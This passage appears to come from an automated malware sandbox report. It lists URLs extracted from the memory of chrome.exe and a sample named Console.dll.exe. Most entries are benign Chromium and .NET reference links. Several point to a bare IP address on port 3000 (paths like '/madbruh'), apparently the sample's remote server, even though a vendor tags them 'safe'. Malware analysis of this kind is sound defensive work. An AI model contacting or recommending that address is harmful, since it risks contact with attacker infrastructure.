                                                                https://anglebug.com/4966chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://anglebug.com/7319chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://issuetracker.google.com/255411748chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://anglebug.com/5421chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://anglebug.com/7047chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://anglebug.com/7246chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://anglebug.com/7369chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://anglebug.com/7489chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://issuetracker.google.com/274859104chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://anglebug.com/6878chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                      		high
                                                                                      http://anglebug.com/6755chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://anglebug.com/6876chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://anglebug.com/7724chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.vign.com/CPS04chrome.exe, 00000008.00000002.2551193176.0000023E8559B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://aka.ms/dotnet-illink/comConsole.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000000.00000002.1645448627.000000006D2D2000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006D2D2000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                              		high
                                                                                              https://issuetracker.google.com/161903006chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://anglebug.com/7172chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://anglebug.com/7899chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://178.23.190.70:3000/madbruh)FileConsole.dll.exefalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://anglebug.com/7279chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://anglebug.com/3078chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://anglebug.com/7036chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/7553chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/5375chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anglebug.com/6860chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anglebug.com/5371chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/4722chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/5658chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/5535chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.newtonsoft.com/jsonschemaConsole.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://anglebug.com/4324chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/7556chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/dotnet/runtime/issues/50821Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://github.com/ericsink/SQLitePCL.rawSQLitePCLRaw.core.dll.0.drfalse
                                                                                                                                  		high
                                                                                                                                  http://178.23.190.70:3000/dConsole.dll.exe, 00000000.00000002.1628910650.0000000005D06000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://issuetracker.google.com/187425444chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://aka.ms/dotnet/downloadConsole.dll.exe, Console.dll.exe.0.drfalse
                                                                                                                                      		high
                                                                                                                                      http://178.23.190.70:3000/madbruhXConsole.dll.exe, 00000000.00000002.1629219762.0000000008E40000.00000004.00001000.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000002.2001043438.0000000008660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://html4/loose.dtdConsole.dll.exe, Console.dll.exe.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://anglebug.com/3584chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/4551chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://anglebug.com/5881chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/6692chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/mono/linker/pull/2125.Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://issuetracker.google.com/258207403chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://issuetracker.google.com/253522366chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://anglebug.com/3502chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/3623chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/3625chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/3624chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/3586chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/5007chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://issuetracker.google.com/184850002chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://anglebug.com/4836chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://issuetracker.google.com/issues/166475273chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552197489.0000179400040000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://.cssConsole.dll.exe, Console.dll.exe.0.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://github.com/dotnet/runtime4System.Dynamic.Runtime.dll.0.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://aka.ms/dotnet/sdk-not-foundFailedConsole.dll.exe, Console.dll.exe.0.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://aka.ms/dotnet-core-applaunch?Console.dll.exe, Console.dll.exe.0.drfalse
                                                                                                                                                                                  		high
